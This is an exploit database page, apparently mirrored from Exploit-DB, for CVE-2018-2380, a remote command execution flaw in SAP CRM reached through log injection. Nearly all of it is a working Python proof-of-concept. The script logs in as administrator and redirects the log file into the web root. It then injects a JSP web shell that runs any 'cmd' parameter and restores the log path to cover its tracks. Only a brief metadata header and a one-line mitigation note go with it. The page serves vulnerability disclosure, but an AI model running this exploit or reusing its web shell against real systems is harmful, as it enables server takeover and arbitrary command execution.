header-logo
Suggest Exploit
vendor:
CRM
by:
Vahagn Vardanian and Bob NewFranny
6.6
CVSS
MEDIUM
Log injection
94
CWE
Product Name: CRM
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2018-2380
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
2018

Remote Command Execution via Log injection on SAP CRM

PoC of Remote Command Execution via Log injection on SAP CRM. This exploit allows an attacker to inject malicious code into the log files of the SAP CRM application, which can then be used to execute arbitrary commands on the server.

Mitigation:

Ensure that all user-supplied input is validated and sanitized before being used in log files.
Source

Exploit-DB raw data:

#!/usr/bin/env python
import argparse
import urllib

import requests, random
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
help_desc = '''
PoC of Remote Command Execution via Log injection on SAP CRM
-- ERPScan

python crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true
'''
baner = '''
 _______  _______  _______  _______  _______  _______  _
(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
| (      | (\ (   | (            ) || |      | (   ) || | \   |
| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
CVE-2018-2380

'''


def start(ip, port, username, password, sid, ssl):
    if ssl == None:
        base_scheme = 'http'
    else:
        base_scheme = 'https'
    req_adapter = requests.session()
    _server_ip_port = "{0}:{1}".format(ip, port)
    _username = username
    admin_password = password
    _headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Referer": "{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1".format(
                    base_scheme,_server_ip_port)
                }

    # shell name
    _shell_name = "ERPScan_shell_{0}".format(random.randint(1337, 31337))

    # shell_code
    shell_code = '''
        <%@ page import="java.util.*,java.io.*"%>
        <% 
        if (request.getParameter("cmd") != null) {
            out.println("Command: " + request.getParameter("cmd") + "<BR>");
            Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
           }    
        }
        %>
        '''
    # urls variables
    _irj_portal = "{0}://{1}/irj/portal".format(base_scheme,_server_ip_port)
    _b2b_admin_url = "{0}://{1}/b2b/admin/index.jsp".format(base_scheme,_server_ip_port)
    _url_of_log_path = "{0}://{1}/b2b/admin/logging.jsp".format(base_scheme,_server_ip_port)
    _url_write_shell_to_log_file = "{0}://{1}/b2b/init.do?\"%22]{2}[%22\"".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))

    # data variable
    _post_data_restore_log_path = {"selConfigName": "com.sap.isa",
                                   "selSeverity": "0",
                                   "selDest": "./default_log_name.log",
                                   "selLimit": "10485760",
                                   "selCount": "20",
                                   "selFormatterType": "ListFormat",
                                   "selPattern": "none",
                                   "mode": "save",
                                   "selLocationIdx": "1"}
    _post_data_to_change_log_path = {"selConfigName": "com.sap.isa",
                                     "selSeverity": "0",
                                     "selDest": "C:\\usr\\sap\\{0}\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\{1}.jsp".format(sid, _shell_name),
                                     "selLimit": "10485760",
                                     "selCount": "20",
                                     "selFormatterType": "ListFormat",
                                     "selPattern": "none",
                                     "mode": "save",
                                     "selLocationIdx": "1"}

    print("{0} \n[!] Try to get RCE using log injection ".format(baner))

    print("[!] Get j_salt token for requests")
    res = requests.get(_irj_portal, headers=_headers, verify=False)
    soup = BeautifulSoup(res.text, "html.parser")
    e = soup.find("input", {"name": "j_salt"})
    __j_salt = e['value']

    print("[!] Login to the SAP portal")
    req_adapter.post(_b2b_admin_url,
                     headers=_headers,
                     data={"login_submit": "on", "login_do_redirect": "1", "j_salt": __j_salt,
                           "j_username": "{0}".format(_username), "j_password": "{0}".format(admin_password),
                           "uidPasswordLogon": "Log On"}, verify=False)

    print("[!] Change log path ")
    req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)

    print("[!] Upload \"Runtime.getRuntime().exec(request.getParameter(\"cmd\")) \" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig".format(base_scheme,_server_ip_port, _shell_name))
    req_adapter.get(_url_write_shell_to_log_file, headers=_headers)

    print("[!] Restore logs path to ./default_log_name.log")
    req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)

    print("[!] Enjoy!")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')
    parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')

    parser.add_argument('-u', '--username', help='SAP CRM administrator')
    parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')

    parser.add_argument('-s', '--SID', help='SAP SID')
    parser.add_argument('-S', '--ssl', help='Use ssl connection')

    args = parser.parse_args()
    args_dict = vars(args)

    host = args_dict['host']
    port = args_dict['port']
    username = args_dict['username']
    password = args_dict['password']
    sid = args_dict['SID']
    ssl = args.ssl
    start(host, port, username, password, sid, ssl)

Navigation

Suggest Exploit

Services By CQR